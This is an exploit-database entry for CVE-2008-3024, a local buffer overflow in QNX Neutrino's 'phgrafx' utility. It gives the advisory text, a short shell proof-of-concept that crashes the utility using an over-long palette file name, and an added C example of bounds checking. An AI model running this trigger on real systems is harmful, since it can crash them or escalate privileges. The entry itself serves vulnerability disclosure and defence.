QNX Neutrino RTOS 6.3 - 'phgrafx' Local Buffer Overflow Vulnerability

2008-07-01T00:00:00
ID EDB-ID:32009
Type exploitdb
Reporter Filipe Balestra
Modified 2008-07-01T00:00:00

Description

QNX Neutrino RTOS 6.3 'phgrafx' Local Buffer Overflow Vulnerability. CVE-2008-3024. DoS exploit for unix platform.

source: http://www.securityfocus.com/bid/30024/info

QNX Neutrino RTOS is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. This issue affects the 'phgrafx' utility.

Attackers can exploit this issue to execute arbitrary code with superuser privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts will result in a denial of service.

QNX Neutrino RTOS 6.3.2 and 6.3.0 are vulnerable; other versions may be affected as well.

# PHOTON_PATH=/tmp
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx
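
The commands above place a 294-byte file name (290 "A" characters plus ".pal") in a palette directory under PHOTON_PATH. The following C sketch is an added example, not QNX code and not part of the advisory: it shows directory entries being length-checked before they are copied into a fixed-size name buffer. PAL_NAME_MAX and all function names are assumptions, since the advisory does not publish the affected code or its buffer size.

```c
#include <dirent.h>
#include <stdio.h>
#include <string.h>

#define PAL_NAME_MAX 256 /* assumed buffer size; the real one is not stated */

/* Returns 0 if stored, -1 if not a .pal entry, -2 if too long for dst
 * (rejected outright: never truncated, never written past the buffer). */
int store_palette_name(char dst[PAL_NAME_MAX], const char *entry)
{
    size_t len = strlen(entry);
    if (len < 5 || strcmp(entry + len - 4, ".pal") != 0)
        return -1;
    if (len >= PAL_NAME_MAX)      /* no room for the name plus its NUL */
        return -2;
    memcpy(dst, entry, len + 1);  /* length already proven to fit */
    return 0;
}

/* Scan a palette directory, counting accepted and over-long entries. */
int scan_palette_dir(const char *dir, int *accepted, int *rejected)
{
    char name[PAL_NAME_MAX];
    struct dirent *de;
    DIR *d = opendir(dir);
    *accepted = *rejected = 0;
    if (d == NULL) return -1;
    while ((de = readdir(d)) != NULL) {
        int rc = store_palette_name(name, de->d_name);
        if (rc == 0) (*accepted)++;
        else if (rc == -2) (*rejected)++;
    }
    closedir(d);
    return 0;
}

/* Constructed input: n 'A' characters followed by ".pal" (n = 290 above). */
int check_constructed_name(size_t n)
{
    char entry[1024], dst[PAL_NAME_MAX];
    if (n + 5 > sizeof entry) return -3;
    memset(entry, 'A', n);
    memcpy(entry + n, ".pal", 5);
    return store_palette_name(dst, entry);
}

int main(void)
{
    printf("%d %d\n", check_constructed_name(8), check_constructed_name(290));
    return 0;
}
```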